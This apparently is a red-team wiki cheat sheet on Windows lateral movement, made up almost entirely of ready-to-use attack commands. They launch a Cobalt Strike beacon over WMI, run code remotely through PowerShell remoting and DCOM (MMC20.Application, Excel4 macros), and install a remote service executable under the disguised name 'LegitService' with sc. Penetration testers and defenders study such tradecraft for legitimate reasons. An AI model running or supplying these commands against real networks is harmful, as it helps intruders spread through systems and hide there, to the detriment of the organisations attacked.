Lateral Movement

WMI

#return value of 0 = successful

wmic process call create beacon.exe 

Invoke-WMIMethod -Class win32_process -Name create -ArgumentList beacon.exe

WMImplant - https://github.com/FortyNorthSecurity/WMImplant

PsRemote

Enter-PSSession 192.168.1.2

Invoke-Command -ScriptBlock {whoami} -ComputerName 192.168.1.2

DCOM

Invoke-DCOM -ComputerName "192.168.1.1" -Method MMC20.Application -Command "Notepad.exe"

XML macros can be injected into DCOM to laterally move also

PowerShell - https://github.com/OutFlanknl/Excel4-DCOM Aggressor - https://github.com/OutFlanknl/Excel4-DCOM Execute-Assembly - https://github.com/rvrsh3ll/SharpExcel4-DCOM

PsExec

SC

# Create Windows Service EXE from cobalt strike 
sc \\pc.domain.com create LegitService binpath="C:\windows\tasks\service.exe"
sc \\pc.domain.com start LegitService

PreviousCheatsheet NextPersistence

Last updated 2 years ago

hashtagWMI

hashtagPsRemote

hashtagDCOM

hashtagPsExec

hashtagSC

WMI

PsRemote

DCOM

PsExec

SC